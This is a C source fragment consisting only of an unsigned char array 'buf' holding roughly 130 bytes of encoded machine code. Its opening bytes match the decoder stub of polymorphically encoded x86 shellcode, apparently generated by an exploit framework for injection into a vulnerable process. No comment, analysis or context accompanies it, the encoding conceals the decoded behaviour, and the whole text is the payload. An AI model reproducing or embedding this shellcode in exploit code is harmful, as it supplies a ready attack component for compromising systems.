unsigned char buf[] = 
"\xba\x66\x7a\x24\x1b\xda\xc6\xd9\x74\x24\xf4\x58\x29\xc9"
"\xb1\x1b\x31\x50\x13\x03\x50\x13\x83\xc0\x62\x98\xd1\xc0"
"\xb6\x85\x6e\xd3\xb2\x68\xa4\xd2\x8b\x81\x07\x6d\x12\xab"
"\x0e\x5f\x8a\xb5\x73\x71\xae\xc5\x1d\x9b\x25\xc6\x85\x62"
"\xd1\x39\x2c\x54\x29\x92\xc6\xa7\xfd\xb0\x15\x40\x79\x6e"
"\xf5\xba\xc3\x7e\x36\xd0\x49\xe5\x9a\x4f\xa1\x3a\x5c\xe4"
"\xc9\xdd\x79\x1a\x58\xac\x5f\x2b\xeb\x63\x8c\x51\x70\x49"
"\xb5\x59\x7e\xb9\x3c\xc6\x93\xdb\x51\x24\xc2\xba\x34\x82"
"\xdd\xe3\xde\xb7\x72\x07\x11\xc1\xbb\xbd\x02\xcd\xe2\xf0"
"\xe9\xd2\x49\x27\x76\x52";
